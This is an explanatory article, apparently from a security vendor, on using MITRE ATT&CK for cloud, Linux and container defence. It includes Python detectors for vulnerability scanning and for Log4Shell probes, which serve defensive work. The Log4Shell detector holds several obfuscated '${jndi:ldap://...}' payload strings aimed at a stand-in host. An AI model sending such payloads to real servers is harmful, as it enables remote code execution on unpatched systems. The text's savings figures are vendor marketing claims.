MITRE ATT&CK™ is a knowledge base of adversary behaviour that security teams use to understand, detect and defend against attacks. ATT&CK, short for Adversarial Tactics, Techniques, and Common Knowledge, catalogues the tactics and techniques adversaries use against real systems, based on observations of real-world intrusions rather than on theory.
MITRE started the project in 2013 to “document common TTPs that advanced persistent threats use against Windows enterprise networks” and released it publicly in 2015. The corporation gathers information on observed threats, then documents and classifies it in several “matrices”: Enterprise, Mobile, and ICS (Industrial Control Systems), each with platform-specific sub-matrices.
The framework helps organisations understand the behaviours and goals behind each threat, expressed as TTPs: tactics, techniques, and procedures. Tactics are the adversary's goals (the “why”, such as initial access or persistence), techniques are the methods used to achieve those goals (the “how”), and procedures are the specific implementations observed in the wild (a particular group's tooling, command lines or malware).
When incorporating this structure into your strategy, MITRE ATT&CK can help security analysts answer the following questions:
- What are the goals of the attack?
- Why would adversaries use this approach?
- Which tools and techniques did cyber attackers use for this attack?
- What kinds of user behaviour lead to this attack?
- Which threat groups are known to use these techniques, and which sectors or regions do they target?
This data helps analysts identify a threat and decide how to detect and mitigate it. MITRE ATT&CK mitigations are security concepts and classes of technology (for example, updating software or segmenting networks) that block or reduce the impact of a technique. Each technique entry lists the mitigations that apply to it, and a single mitigation typically maps to many techniques.
The relevance of Linux in the cloud
Linux is one of the world’s most popular operating systems (OS). As of 2017 it ran an estimated 90% of public cloud workloads. Given the low cost of ownership and reliability of Linux servers, it is not surprising that companies prefer it. Linux is open source, which means developers from across the world can inspect and improve the system.
As developers gravitated toward Linux, the assumption was that many eyes would catch security flaws faster, making it safer. But the same popularity among those operating critical public and private systems made Linux a more valuable target, and threat actors directed their attacks accordingly.
Trend Micro’s Linux Threat Report 2021 found attackers targeting over 200 vulnerabilities in a six-month period. The most common malware families identified were coin miners (24.56%), web shells (19.92%), ransomware (11.55%), and trojans (9.65%). This demonstrates the need for proper security controls in your organisation, regardless of your operating system of choice.
What is MITRE ATT&CK for containers?
Containers are the common packaging for microservice-based applications in the cloud and are central to cloud infrastructure. A Linux container is one or a few processes isolated from the rest of the host by kernel namespaces and cgroups; it shares the host kernel rather than running its own. LXC is one open-source implementation, and Docker and the OCI runtimes are others.
Each container serves a specific purpose and packages an application with its dependencies, independent of the host’s runtime environment. Because containers are built, stored, shipped and run through a pipeline (build system, image registry, orchestrator, runtime), securing them means protecting that entire pipeline rather than just the running container.
MITRE ATT&CK for Containers takes this into account and presents adversary behaviour at both the orchestration level (for example, Kubernetes) and the container level in a single matrix. Because the matrix is built from real-world observations contributed by organisations like Trend Micro, it is a solid reference for what to expect and how to mitigate it.
How to use MITRE ATT&CK effectively
Given its scalability and flexibility, use of the public cloud is now common. This has led businesses to look for tailored guidance on keeping their business-critical applications secure. The MITRE ATT&CK Cloud matrix is a foundational tool for achieving that resilience, as the following examples show.
The ATT&CK knowledge base provides insight into the techniques that can be used against various systems. For cloud-based systems, at the time of writing it covers five platforms: Microsoft 365, Microsoft Azure AD, Google Workspace, IaaS, and SaaS. It also covers operating systems, networks, and containers, with detection and mitigation guidance for each. The knowledge base does the heavy lifting for enterprises, so they can focus on securing their systems.
Security operations centre (SOC) teams can use this overview to understand each threat type in detail. SOCs can then implement this within their current frameworks and train incoming and existing team members on how to interpret it.
Because MITRE’s knowledge base is comprehensive and well classified, security teams can prioritise threats by risk, check their current defences against the relevant techniques, and identify gaps.
When MITRE publishes a new technique, group or software entry, the security team can analyse it and test whether current systems are exposed. SOC teams can automate continuous threat hunting against these techniques and use what they find to run penetration or adversary-emulation exercises that assess how well their controls hold up.
After identifying a threat or vulnerability, the SOC needs specific procedures to resolve the issue as quickly as possible. ATT&CK entries show how a technique is typically executed, where it sits in the intrusion, and what damage it can cause. By homing in on the entry point and the likely path of the breach, the SOC can remediate at the source. This significantly cuts detection and investigation time, because the team does not have to research the background from scratch.
To identify and remediate the issue, SOC teams can use tools and services like Trend Micro Cloud One™ and Trend Micro Vision One™. These solutions map their findings to the framework to scan, identify, and mitigate the issue quickly, which Trend Micro estimates saves companies between 2,100 and 6,100 hours per year.
Trend Micro Vision One collects security telemetry from multiple sources such as cloud workloads, networks, and email. It correlates the available data to provide context and comprehensive reports on the true nature of a breach. This lets SOC teams focus on the remedial measures that match the threat level.
ATT&CK entries relevant to adversaries scanning for vulnerabilities (technique T1595.002, Active Scanning: Vulnerability Scanning) include the following. Note that the G-prefixed IDs are ATT&CK group entries documenting adversary behaviour, not scanning capabilities for the SOC to use:
- G0007 (APT28): documented performing large-scale scans to find vulnerable servers
- G0034 (Sandworm Team): documented scanning network infrastructure for vulnerabilities as part of operational planning
- G0016 (APT29): documented scanning target environments to identify exploitable vulnerabilities
- DS0029 (Network Traffic): the data source ATT&CK lists for detecting such scanning, by recognising unusual traffic patterns against a particular network
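The DS0029 detection guidance above amounts to spotting a source that touches many distinct resources in a short burst, most of which do not exist. The following is an added example, not code from the original page or from Trend Micro, that runs that logic over constructed web-server access log lines (the IP addresses are RFC 5737 test addresses and the requested paths are typical scanner probes; the thresholds are assumptions to tune per environment):

```python
"""Flag sources whose request pattern looks like an automated vulnerability
scan: many distinct URIs, mostly 404s, inside a short time window.
The access log below is constructed in Apache common log format."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: 203.0.113.7 walks a list of common admin/config paths,
# 198.51.100.20 is an ordinary visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:13:00:01 +0000] "GET /.env HTTP/1.1" 404 196
203.0.113.7 - - [10/Dec/2021:13:00:01 +0000] "GET /wp-login.php HTTP/1.1" 404 196
203.0.113.7 - - [10/Dec/2021:13:00:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 196
203.0.113.7 - - [10/Dec/2021:13:00:02 +0000] "GET /manager/html HTTP/1.1" 404 196
203.0.113.7 - - [10/Dec/2021:13:00:03 +0000] "GET /solr/admin/ HTTP/1.1" 404 196
203.0.113.7 - - [10/Dec/2021:13:00:03 +0000] "GET /actuator/env HTTP/1.1" 404 196
203.0.113.7 - - [10/Dec/2021:13:00:04 +0000] "GET /console/ HTTP/1.1" 404 196
203.0.113.7 - - [10/Dec/2021:13:00:04 +0000] "GET /api/v1/ HTTP/1.1" 200 512
198.51.100.20 - - [10/Dec/2021:13:00:05 +0000] "GET / HTTP/1.1" 200 3021
198.51.100.20 - - [10/Dec/2021:13:00:06 +0000] "GET /static/app.css HTTP/1.1" 200 1200
198.51.100.20 - - [10/Dec/2021:13:00:07 +0000] "GET /favicon.ico HTTP/1.1" 404 196
198.51.100.20 - - [10/Dec/2021:13:00:20 +0000] "GET /api/v1/ HTTP/1.1" 200 512
"""


def parse_line(line):
    """Return (ip, timestamp, path, status) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], int(m["status"])


def detect_scanners(log_text, window_seconds=60, min_distinct_paths=5, min_404_ratio=0.6):
    """Sliding window per source IP. A source is flagged when, within any
    window of `window_seconds`, it requests at least `min_distinct_paths`
    distinct URIs and at least `min_404_ratio` of those requests return 404.
    Returns {ip: (distinct_paths, not_found, total)} for the widest such window."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_ip[rec[0]].append(rec[1:])  # (ts, path, status)

    window = timedelta(seconds=window_seconds)
    alerts = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            current = events[start:end + 1]
            paths = {path for _, path, _ in current}
            not_found = sum(1 for _, _, status in current if status == 404)
            if len(paths) >= min_distinct_paths and not_found / len(current) >= min_404_ratio:
                best = alerts.get(ip)
                if best is None or len(paths) > best[0]:
                    alerts[ip] = (len(paths), not_found, len(current))
    return alerts


if __name__ == "__main__":
    for ip, (paths, nf, total) in detect_scanners(SAMPLE_LOG).items():
        print(f"{ip}: {paths} distinct paths, {nf}/{total} returned 404 -> possible T1595.002")
```

The 404 ratio is what separates a scanner from a busy legitimate client, and the window keeps a slow crawler from accumulating into an alert; both thresholds need tuning against your own baseline before the rule goes into production.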
The main reason for using threat intelligence is to mitigate potential threats rather than constantly absorbing the losses that follow breaches. A recent example is the vulnerability uncovered in Apache Log4j, a logging library for Java that is widely used in enterprise cloud applications; the flaw allowed remote code execution and was rated critical (CVSS 10.0).
Apache released a fix (Log4j 2.15.0, which required Java 8; builds for older Java versions and follow-up releases came later), but many systems were compromised before they could patch. This led Trend Micro to release a Log4Shell Vulnerability Assessment Tool to help identify exposed systems.
Threat detection and mitigation tools are crucial during events like this. Teams can combine them with other mitigation strategies, such as virtual patching and intrusion detection and prevention systems (IDS/IPS), to detect and block exploitation attempts quickly while the real patch is rolled out. Virtual patching is a stopgap that buys time; it does not replace updating the library.
Trend Micro IPS rules that apply to this case include:
- Rule 1011242: Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
- Rule 1005177: Restrict Java Bytecode File (Jar/Class) Download
- Rule 1008610: Block Object-Graph Navigation Language (OGNL) Expressions Initiation in Apache Struts HTTP Request
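An IPS rule such as 1011242 has to recognise the Log4Shell lookup string in request data even when attackers nest Log4j's own lookup syntax (`${lower:...}`, `${upper:...}`, `${...:-default}`) to break a naive `${jndi:` match. The following is an added example, not code from the original page or from Trend Micro's rule, showing the normalisation such a detector needs; the sample request fields are constructed and 203.0.113.9 is a test address.

```python
"""Detect Log4Shell (CVE-2021-44228) probe strings in request fields, including
the nested-lookup obfuscations used to evade a plain '${jndi:' signature."""
import re
from urllib.parse import unquote

# Innermost ${...} expression: one that contains no further '$', '{' or '}'.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup naming one of the protocols the Log4j lookup could reach.
JNDI = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://", re.IGNORECASE)


def resolve_lookups(text, max_rounds=256):
    """Collapse the lookup forms attackers nest to hide 'jndi':
      ${lower:J}        -> j
      ${upper:j}        -> J
      ${::-j}           -> j      (empty lookup, ':-' default value)
      ${env:NOPE:-j}    -> j      (unset variable, default value)
    Any other lookup is unwrapped to its literal body, so the loop always
    terminates; max_rounds bounds work on pathological input."""
    for _ in range(max_rounds):
        m = INNERMOST.search(text)
        if not m:
            break
        body = m.group(1)
        if body.lower().startswith("lower:"):
            value = body[len("lower:"):].lower()
        elif body.lower().startswith("upper:"):
            value = body[len("upper:"):].upper()
        elif ":-" in body:
            value = body.split(":-", 1)[1]
        else:
            value = body
        text = text[:m.start()] + value + text[m.end():]
    return text


def is_log4shell_probe(field):
    """True if the field, after URL-decoding and lookup resolution, contains a JNDI lookup."""
    return JNDI.search(resolve_lookups(unquote(field))) is not None


# Constructed request fields (User-Agent / query values) as an IPS would see them.
SAMPLE_FIELDS = [
    "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/95.0",
    "${jndi:ldap://203.0.113.9:1389/a}",
    "${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/a}",
    "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.9:1099/a}",
    "%24%7Bjndi%3Adns%3A%2F%2F203.0.113.9%2Fa%7D",
    "search?q=${date:yyyy-MM-dd}",
]


def flag_fields(fields):
    """Return the indexes of the fields that look like Log4Shell probes."""
    return [i for i, f in enumerate(fields) if is_log4shell_probe(f)]


if __name__ == "__main__":
    for i in flag_fields(SAMPLE_FIELDS):
        print(f"field {i}: {SAMPLE_FIELDS[i]!r} -> {resolve_lookups(unquote(SAMPLE_FIELDS[i]))!r}")
```

The last sample field shows why resolution matters in the other direction too: a benign `${date:...}` lookup is unwrapped and not flagged, whereas a rule that simply blocks every `${` would generate noise. A signature like this still only sees what reaches the IPS (TLS-terminated, in the fields it inspects), which is why the text treats it as a complement to patching rather than a substitute.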
The MITRE ATT&CK framework supports a threat-based defence strategy that improves an organisation’s security posture. Teams can identify gaps in their current controls, an exercise known as a defensive gap assessment.
By testing their ability to detect, analyse, and respond to each relevant technique, SOC teams can see how well their current systems stack up. The same exercise can be used to evaluate new tools before buying them. Tools built around the framework, like Trend Micro Vision One, add the benefit of helping teams plan and prioritise their company’s security investments.
By regularly monitoring your security infrastructure, the SOC can use what it observes to make data-driven decisions on the design and architecture your organisation needs. These decisions matter because your ability to detect, mitigate and remediate threats rests on that underlying infrastructure.
To build more secure systems, teams map their defensive controls to the TTPs they expect to face. MITRE ATT&CK’s terminology can be used as a common reference point during red teaming, purple teaming, or penetration testing, for planning, execution, and reporting alike. The results feed an enterprise-wide view of your posture and a plan to improve it.
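Both the TTP model introduced earlier (tactics, techniques, and the mitigations mapped to each technique) and the defensive gap assessment described here come down to walking the relationships in ATT&CK's published STIX data. The following is an added example, not code from the original page or from MITRE, that indexes a miniature bundle of the same shape as the public enterprise-attack.json from github.com/mitre/cti and then lists which techniques your applied mitigations leave uncovered. The bundle is constructed: the STIX object IDs are made up, while the ATT&CK IDs (T1595.002, T1190, T1505.003, M1051, M1056, G0034) are real catalogue IDs.

```python
"""Index a (constructed) ATT&CK STIX 2.1 bundle into the technique -> tactic,
technique -> mitigation and group -> technique views, then run a defensive gap
check: which in-scope techniques have no applied mitigation."""
import json
from collections import defaultdict

# Constructed miniature of enterprise-attack.json. Object IDs are made up.
BUNDLE_JSON = """
{"type": "bundle", "id": "bundle--example", "objects": [
 {"type": "attack-pattern", "id": "attack-pattern--a1", "name": "Active Scanning: Vulnerability Scanning",
  "external_references": [{"source_name": "mitre-attack", "external_id": "T1595.002"}],
  "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}]},
 {"type": "attack-pattern", "id": "attack-pattern--a2", "name": "Exploit Public-Facing Application",
  "external_references": [{"source_name": "mitre-attack", "external_id": "T1190"}],
  "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}]},
 {"type": "attack-pattern", "id": "attack-pattern--a3", "name": "Server Software Component: Web Shell",
  "external_references": [{"source_name": "mitre-attack", "external_id": "T1505.003"}],
  "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}]},
 {"type": "course-of-action", "id": "course-of-action--m1", "name": "Update Software",
  "external_references": [{"source_name": "mitre-attack", "external_id": "M1051"}]},
 {"type": "course-of-action", "id": "course-of-action--m2", "name": "Pre-compromise",
  "external_references": [{"source_name": "mitre-attack", "external_id": "M1056"}]},
 {"type": "intrusion-set", "id": "intrusion-set--g1", "name": "Sandworm Team",
  "external_references": [{"source_name": "mitre-attack", "external_id": "G0034"}]},
 {"type": "relationship", "id": "relationship--r1", "relationship_type": "mitigates",
  "source_ref": "course-of-action--m1", "target_ref": "attack-pattern--a2"},
 {"type": "relationship", "id": "relationship--r2", "relationship_type": "mitigates",
  "source_ref": "course-of-action--m2", "target_ref": "attack-pattern--a1"},
 {"type": "relationship", "id": "relationship--r3", "relationship_type": "uses",
  "source_ref": "intrusion-set--g1", "target_ref": "attack-pattern--a1"},
 {"type": "relationship", "id": "relationship--r4", "relationship_type": "uses",
  "source_ref": "intrusion-set--g1", "target_ref": "attack-pattern--a2"}
]}
"""


def attack_id(obj):
    """ATT&CK external ID (e.g. T1190, M1051, G0034) of a STIX object, or None."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def index_bundle(bundle):
    """Return (technique -> [tactics], technique -> {mitigations}, group -> {techniques}).
    Revoked and deprecated objects are skipped, as they must be with the real data."""
    objs = {o["id"]: o for o in bundle["objects"]
            if not o.get("revoked") and not o.get("x_mitre_deprecated")}
    tactics, mitigations, groups = {}, defaultdict(set), defaultdict(set)
    for o in objs.values():
        tid = attack_id(o)
        if o["type"] == "attack-pattern" and tid:
            tactics[tid] = sorted(p["phase_name"] for p in o.get("kill_chain_phases", [])
                                  if p.get("kill_chain_name") == "mitre-attack")
    for o in objs.values():
        if o["type"] != "relationship":
            continue
        src, dst = objs.get(o["source_ref"]), objs.get(o["target_ref"])
        if not src or not dst or dst["type"] != "attack-pattern":
            continue  # relationship to a revoked or unknown object
        if o["relationship_type"] == "mitigates" and src["type"] == "course-of-action":
            mitigations[attack_id(dst)].add(attack_id(src))
        elif o["relationship_type"] == "uses" and src["type"] == "intrusion-set":
            groups[attack_id(src)].add(attack_id(dst))
    return tactics, dict(mitigations), dict(groups)


def group_profile(bundle, group_id):
    """'What does this group do, why, and what stops it': each technique the
    group uses, with its tactic(s) and the mitigations ATT&CK maps to it."""
    tactics, mitigations, groups = index_bundle(bundle)
    return [(t, tactics.get(t, []), sorted(mitigations.get(t, ())))
            for t in sorted(groups.get(group_id, ()))]


def unmitigated_techniques(bundle, applied_mitigations):
    """Defensive gap: techniques that none of the applied mitigations cover."""
    tactics, mitigations, _ = index_bundle(bundle)
    applied = set(applied_mitigations)
    return sorted(t for t in tactics if not (mitigations.get(t, set()) & applied))


BUNDLE = json.loads(BUNDLE_JSON)

if __name__ == "__main__":
    for tech, tacs, mits in group_profile(BUNDLE, "G0034"):
        print(tech, tacs, mits or "(no mitigation mapped)")
    print("gaps with only M1051 applied:", unmitigated_techniques(BUNDLE, ["M1051"]))
```

Against the full enterprise-attack.json the same functions work unchanged (`json.load` the file in place of `BUNDLE_JSON`); the useful refinement is to restrict `tactics` to the techniques your threat model scopes in, typically the union of `group_profile` for the groups you care about, so the gap list reflects expected adversaries rather than the whole matrix. Note that a technique with no mitigation entry (here T1505.003 in the miniature) shows up as a gap that only detection can close, which is exactly the kind of finding the assessment is meant to surface.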
Regulatory compliance is a significant undertaking, and SOC teams need tools that keep it manageable. ATT&CK techniques can be mapped to compliance controls, so the same regular testing demonstrates both that systems are secure and that they are compliant.
Trend Micro Cloud One does this mapping automatically. Because the software is built around the framework, teams receive up-to-date data for each control, which shows the compliance status of their systems. The Forrester Total Economic Impact study found that companies spend 50% less time on compliance with Trend Micro Cloud One, while increasing the pace of cloud migration projects by 10%.
Wealth of insight
MITRE ATT&CK is one of the most comprehensive databases of cybersecurity threats available. Constantly updated from real-world observations, and covering everything from technique identification to mitigation, MITRE ATT&CK provides a wealth of insight.
To use MITRE ATT&CK effectively, the SOC must account for several factors. First, the team needs to understand the nature of the threats relevant to its environment; building the security infrastructure and response procedures on the framework's data gives a broad overview of what to look out for and when to act. Second, that mapping must be integrated into the organisation’s existing security infrastructure, so that the systems that identify these techniques also drive patching and remediation.
By using MITRE’s recommended mitigations, SOC teams can ensure they are using tried and tested methods to block potential threats. Solutions such as Trend Micro Cloud One and Trend Micro Vision One present their data in the context of MITRE's framework so that your SOC team can see the big picture.
These products give users a complete overview of their security posture and built-in playbooks to tackle potential breaches without manual intervention. With MITRE ATT&CK as the common reference, you can protect your systems against known adversary behaviour now, and keep pace as the knowledge base evolves.